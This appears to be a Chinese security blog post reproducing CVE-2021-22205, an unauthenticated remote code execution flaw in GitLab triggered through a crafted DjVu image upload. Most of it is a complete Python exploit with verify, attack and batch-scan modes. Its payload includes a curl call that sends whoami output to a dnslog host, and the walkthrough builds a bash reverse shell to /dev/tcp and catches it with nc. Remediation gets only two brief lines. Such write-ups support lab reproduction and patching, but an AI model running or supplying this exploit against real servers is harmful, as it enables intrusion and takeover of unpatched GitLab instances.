文章最后更新时间为:2021 年 12 月 19 日 15:33:47 Loading... ## 简述 由于 GitLab 某些端点路径无需授权,攻击者可在无需认证的情况下完成图片上传,从而执行任意命令。 ## 影响版本 > 11.9 <= Gitlab CE/EE < 13.8.8 > 13.9 <= Gitlab CE/EE < 13.9.6 > 13.10 <= Gitlab CE/EE < 13.10.3 ## 复现 靶机:https://github.com/vulhub/vulhub/blob/master/gitlab/CVE-2021-22205/docker-compose.yml > docker-compose up -d ![2021-12-19T06:23:00.png][1] #### poc https://github.com/Al1ex/CVE-2021-22205 import requests from bs4 import BeautifulSoup import base64 import random import sys import os import argparse requests.packages.urllib3.disable_warnings() def title(): print(""" ______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) | \____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/ Author:Al1ex@Heptagram Github:https://github.com/Al1ex """) print(''' 验证模式:python CVE-2021-22205.py -v true -t target_url 攻击模式:python CVE-2021-22205.py -a true -t target_url -c command 批量检测:python CVE-2021-22205.py -s true -f file ''') def check(target_url): session = requests.Session() try: req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) soup = BeautifulSoup(req1.text, features="lxml") token = soup.findAll('meta')[16].get("content") data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{curl `whoami`.82sm53.dnslog.cn} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} flag = 'Failed to process image' req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 目标 {} 存在漏洞".format(target_url)) else: print("[-] 目标 {} 不存在漏洞".format(target_url)) except Exception as e: print(e) def attack(target_url, command): session = requests.Session() try: req1 = session.get(target_url.strip("/") + "/users/sign_in", verify=False) soup = BeautifulSoup(req1.text, features="lxml") token = soup.findAll('meta')[16].get("content") data = "\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=\"file\"; filename=\"test.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3\"?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright \"\\\n\" . qx{" + command + "} . \\\n\" b \") ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5--\r\n\r\n" headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5", "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} flag = 'Failed to process image' req2 = session.post(target_url.strip("/") + "/uploads/user", data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 目标 {} 存在漏洞".format(target_url)) print("[+] 请到dnslog或主机检查执行结果") else: print("[-] 目标 {} 不存在漏洞".format(target_url)) except Exception as e: print(e) def scan(file): for url_link in open(file, 'r', encoding='utf-8'): if url_link.strip() != '': url_path = format_url(url_link.strip()) check(url_path) def format_url(url): try: if url[:4] != "http": url = "https://" + url url = url.strip() return url except Exception as e: print('URL 错误 {0}'.format(url)) def main(): parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ') parser.add_argument('-t', '--target', type=str, help=' 目标URL ') parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ') parser.add_argument('-c', '--command', type=str, help=' 执行命令 ') parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ') parser.add_argument('-f', '--file', type=str, help=' 文件路径 ') args = parser.parse_args() verify_model = args.verify target_url = args.target attack_model = args.attack command = args.command scan_model = args.scan file = args.file if verify_model is True and target_url is not None: check(target_url) elif attack_model is True and target_url is not None and command is not None: attack(target_url, command) elif scan_model is True and file is not None: scan(file) else: sys.exit(0) if __name__ == '__main__': title() main() ![2021-12-19T07:26:58.png][2] #### exp 先写入反弹shell信息到sh文件 > python CVE-2021-22205.py -a true -t http://192.168.223.129:8080 -c "echo 'bash -i >& /dev/tcp/192.168.223.1/966 0>&1' > /tmp/1.sh" 然后给文件权限 > python CVE-2021-22205.py -a true -t http://192.168.223.129:8080 -c "chmod +x /tmp/1.sh" 然后再攻击机监听端口 > nc -lvvp 966 再执行exp > python CVE-2021-22205.py -a true -t http://192.168.223.129:8080 -c "/bin/bash /tmp/1.sh" 反弹shell成功 ![2021-12-19T07:33:41.png][3] ## 修复 > 升级GitLab到最新安全版本 > 配置访问控制策略,避免受影响的GitLab暴露在公网 [1]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/2876691449.png [2]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/427954879.png [3]: https://cdn.jsdelivr.net/gh/R0A1NG/wenzhangupload@latest/usr/uploads/2021/12/1562605317.png Last modification:December 19, 2021 © Allow specification reprint Support Appreciate the author Like 0 如果觉得我的文章对你有用,请随意赞赏